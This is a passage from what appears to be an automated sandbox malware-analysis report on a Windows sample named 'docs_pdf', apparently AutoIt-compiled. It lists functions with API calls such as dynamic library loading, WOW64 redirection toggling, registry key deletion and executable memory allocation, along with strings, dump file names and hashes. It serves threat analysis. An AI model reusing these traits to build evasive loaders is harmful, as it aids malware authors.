                                                              • Part of subcall function 000F7BB1: _memmove.LIBCMT ref: 000F7C0B
                                                            • __swprintf.LIBCMT ref: 0010302D
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00102EC6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 1943609520-557222456
                                                            • Opcode ID: d6b63d55d37ed5ffd1df34341fc2be2a577c5d66864c73faf1b34b3137d78476
                                                            • Instruction ID: a1be5409cfe7060e89b3bfe12dea6d6fa1dc2002486fd25b1ec0293b45b477c0
                                                            • Opcode Fuzzy Hash: d6b63d55d37ed5ffd1df34341fc2be2a577c5d66864c73faf1b34b3137d78476
                                                            • Instruction Fuzzy Hash: D3919931508305AFC728EF24D895CBFB7A8EF95740F00492DF5969B2A2DB60EE44DB52
                                                            Function 0015BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000F48A1,?,?,000F37C0,?), ref: 000F48CE
                                                            • CoInitialize.OLE32(00000000), ref: 0015BC26
                                                            • CoCreateInstance.OLE32(00182D6C,00000000,00000001,00182BDC,?), ref: 0015BC3F
                                                            • CoUninitialize.OLE32 ref: 0015BC5C
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                            • String ID: .lnk
                                                            • API String ID: 2126378814-24824748
                                                            • Opcode ID: ea5fbbea15da76e83dfb6393218d175df2a439fad4c39ee3722fc87154eec02b
                                                            • Instruction ID: d0394cb31cda0c971003b30d2c4795107599aa8c445ac5f16f2f5ad0fa7513df
                                                            • Opcode Fuzzy Hash: ea5fbbea15da76e83dfb6393218d175df2a439fad4c39ee3722fc87154eec02b
                                                            • Instruction Fuzzy Hash: 9BA136756083059FCB00DF14C484E6ABBE5FF88315F158998F9A99B262CB31ED49CB91
                                                            Function 0011524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 001152DD
                                                              • Part of subcall function 00120340: __87except.LIBCMT ref: 0012037B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__87except__start
                                                            • String ID: pow
                                                            • API String ID: 2905807303-2276729525
                                                            • Opcode ID: c76f2b48bda2d954486275df6a27fe43e9ecd2106f8f07981dd315cc177119b3
                                                            • Instruction ID: 5b737a63fab2b99cfbd536712c1f4d475d437b8836e41f5927d9798c96c87b0c
                                                            • Opcode Fuzzy Hash: c76f2b48bda2d954486275df6a27fe43e9ecd2106f8f07981dd315cc177119b3
                                                            • Instruction Fuzzy Hash: E1516C22A1C601C7CB1AB714E9413BE6B91AB84750F308A78E4D5836E7EF74CCE49B46
                                                            Function 0011023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #$+
                                                            • API String ID: 0-2552117581
                                                            • Opcode ID: fe36bc757ac5b48deb659832c2cb41c6c4769804af75a9fa17b4f7616c454de9
                                                            • Instruction ID: b32c6e3dae672cf9cffff80ebe3de24b315b79c5dba835faed1f426a3e076757
                                                            • Opcode Fuzzy Hash: fe36bc757ac5b48deb659832c2cb41c6c4769804af75a9fa17b4f7616c454de9
                                                            • Instruction Fuzzy Hash: 055125359046499FCF1A9FA8C888AFA7BA5FF1A310F144065F8919B2A2D7709C82C761
                                                            Function 001062F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memset$_memmove
                                                            • String ID: ERCP
                                                            • API String ID: 2532777613-1384759551
                                                            • Opcode ID: 9ba64f46e70ba2d3039211ddc0425d3106c9edf5f059f1cff1e5c16e882eefe1
                                                            • Instruction ID: 9227b66b0c448a6a345bbc3398eca15b36f624e94911f29c3e9b1a0ae6ab7e2e
                                                            • Opcode Fuzzy Hash: 9ba64f46e70ba2d3039211ddc0425d3106c9edf5f059f1cff1e5c16e882eefe1
                                                            • Instruction Fuzzy Hash: 1A51B2719007099FDB28CF65C8817AABBF4FF04714F20856EE98ADB691E7B19694CB40
                                                            Function 00177BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0017F910,00000000,?,?,?,?), ref: 00177C4E
                                                            • GetWindowLongW.USER32 ref: 00177C6B
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00177C7B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: 1d28daf1968e4b761a1b7f65c750394ff8556290007523a5672f204d0fb0b9f6
                                                            • Instruction ID: db8b117e4ab9d97ed849b8df6222c94b0ecdbbd0a6450c360c6895d3a4674cde
                                                            • Opcode Fuzzy Hash: 1d28daf1968e4b761a1b7f65c750394ff8556290007523a5672f204d0fb0b9f6
                                                            • Instruction Fuzzy Hash: 8231923120420AABDB118F34CC45BEB77B9EB49324F248729F979932E1D731E9919B50
                                                            Function 00177648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 001776D0
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 001776E4
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00177708
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: 710b24c394995fac7c57bda0a0da404f81eb606b1117c36200be7fab1e413777
                                                            • Instruction ID: d7db07996f81a754b509b081297111e6a028d7a63bbb65085a31404e36184ef6
                                                            • Opcode Fuzzy Hash: 710b24c394995fac7c57bda0a0da404f81eb606b1117c36200be7fab1e413777
                                                            • Instruction Fuzzy Hash: 3A21D132504218BBDF15CFA4CC86FEA3B79EF48714F114254FE196B1D0DBB1A8918BA0
                                                            Function 00176F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00176FAA
                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00176FBA
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00176FDF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MoveWindow
                                                            • String ID: Listbox
                                                            • API String ID: 3315199576-2633736733
                                                            • Opcode ID: 588100512cb2acbeb3eac64b8381d365f230f5ab1a39f1c881fc613a80cc2c65
                                                            • Instruction ID: ce2a7e556ff9aecaa30774a8f95a336dc31bc1c4930f33453cd5426ea3959df2
                                                            • Opcode Fuzzy Hash: 588100512cb2acbeb3eac64b8381d365f230f5ab1a39f1c881fc613a80cc2c65
                                                            • Instruction Fuzzy Hash: 16219232610118BFDF159F54DC95FBB3BBAEF89754F118124FA189B190CB71AC518BA0
                                                            Function 0017797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001779E1
                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001779F6
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00177A03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            • Opcode ID: a143c0e03fc8d7594d0897d4e48fa195647fb01f08f15ebdacdae9b2eda4c18a
                                                            • Instruction ID: cc4a714a08c792e4acac125ef03dddbc995852bdbc599f05746b9daf1bbfbb04
                                                            • Opcode Fuzzy Hash: a143c0e03fc8d7594d0897d4e48fa195647fb01f08f15ebdacdae9b2eda4c18a
                                                            • Instruction Fuzzy Hash: 5D112372244208BAEF109F60CC05FEB3BB9EF89B64F024528FB04A20D0D3719851CB20
                                                            Function 000F4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,000F4C2E), ref: 000F4CA3
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000F4CB5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2574300362-192647395
                                                            • Opcode ID: 6ce1da97879a109b180214d27c53e972ad645df1d0fc13369931c7f9d195175c
                                                            • Instruction ID: 2c8f2c1b1b5d5ee9ca41a82211ad37b438791f09267f053ed318953f3b2b2ddb
                                                            • Opcode Fuzzy Hash: 6ce1da97879a109b180214d27c53e972ad645df1d0fc13369931c7f9d195175c
                                                            • Instruction Fuzzy Hash: 94D01730510727CFD7609F31DA1961776F5AF05791F11C83E988AD6950E770D8C1CA90
                                                            Function 000F4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,000F4D2E,?,000F4F4F,?,001B62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000F4D6F
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000F4D81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-3689287502
                                                            • Opcode ID: 4b2d6c020559c9a93cd50e558ad476037b472b845f604cd3aba407b4e8d5949a
                                                            • Instruction ID: 855c266c2192be3b66540ec77b95ee7042077ca817bdbf7192a34e6fad042df1
                                                            • Opcode Fuzzy Hash: 4b2d6c020559c9a93cd50e558ad476037b472b845f604cd3aba407b4e8d5949a
                                                            • Instruction Fuzzy Hash: 51D01730510713CFD7209F31DC0862776E8AF16362F11C83EA88AD6A90E770D8C1CA50
                                                            Function 000F4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,000F4CE1,?), ref: 000F4DA2
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000F4DB4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
                                                            • Opcode ID: a082b1afc982493e327dfbd4ecb50040d2cef794624ee1533c76da602b957aa3
                                                            • Instruction ID: 4c6810092568cf8cb65e11fe35031c394b4c0bb1759e8e78be6a4420b3f9e75e
                                                            • Opcode Fuzzy Hash: a082b1afc982493e327dfbd4ecb50040d2cef794624ee1533c76da602b957aa3
                                                            • Instruction Fuzzy Hash: 95D0E231550712CFD7209B31D808A5776E4AF06355F12883EE98AD6990E770D8C0CA50
                                                            Function 00171072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,001712C1), ref: 00171080
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00171092
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: a5d5b3b144b2450c4478f0e1b86e438487c50a9d69c8eca29c535c6a7ee01fbf
                                                            • Instruction ID: 26fb1cfd77f57c52b52d6430915cec84663acbd5394ee580d00db57645aa1012
                                                            • Opcode Fuzzy Hash: a5d5b3b144b2450c4478f0e1b86e438487c50a9d69c8eca29c535c6a7ee01fbf
                                                            • Instruction Fuzzy Hash: 33D0E234510752DFD7209B39D858A1B7AF5AF06361B11C82EA48ADA550E770D8C0CA50
                                                            Function 001693F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00169009,?,0017F910), ref: 00169403
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00169415
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            • Opcode ID: 27ca007db9eb365a18ca39c95c5697cebda4abd01179c2c8508bdf7cd5679602
                                                            • Instruction ID: 3cd820b7c29a0d69c56f8e3aa4ee1ed6b3c4998c94d4d54f912815e88de16d3c
                                                            • Opcode Fuzzy Hash: 27ca007db9eb365a18ca39c95c5697cebda4abd01179c2c8508bdf7cd5679602
                                                            • Instruction Fuzzy Hash: 8BD01774654713CFD7209F31DE4862776E9AF05352F51C83EA48AD6950EB70C8C1CA50
                                                            Function 00131B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: LocalTime__swprintf
                                                            • String ID: %.3d$WIN_XPe
                                                            • API String ID: 2070861257-2409531811
                                                            • Opcode ID: 9a7e43adc327d541c1d716a13acfbf6fd643caa3f91b6ecac1fbb9e5777baad7
                                                            • Instruction ID: 0c41bc1defcd2674b13ee81b5a29cedc17019e4f8dbadf7ff8f8a02f5f442602
                                                            • Opcode Fuzzy Hash: 9a7e43adc327d541c1d716a13acfbf6fd643caa3f91b6ecac1fbb9e5777baad7
                                                            • Instruction Fuzzy Hash: 4DD0EC65804118FADA189A9088458FAB77CAB08311F510592B50692404F3359B85AA21
                                                            Function 001476C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 146cfccbc56e36e6409f5e79ab72b8eb185a9bd93502b1ee85fa81a3a6183bfe
                                                            • Instruction ID: 655b441e23c658732b3b139a28c9371b8ee2ada9d440c52824b0d88580203067
                                                            • Opcode Fuzzy Hash: 146cfccbc56e36e6409f5e79ab72b8eb185a9bd93502b1ee85fa81a3a6183bfe
                                                            • Instruction Fuzzy Hash: 61C16075A04216EFCB14CF94C888EAEB7F5FF48714B258599E805EB2A1D730ED81CB90
                                                            Function 0016E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?), ref: 0016E3D2
                                                            • CharLowerBuffW.USER32(?,?), ref: 0016E415
                                                              • Part of subcall function 0016DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0016DAD9
                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0016E615
                                                            • _memmove.LIBCMT ref: 0016E628
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
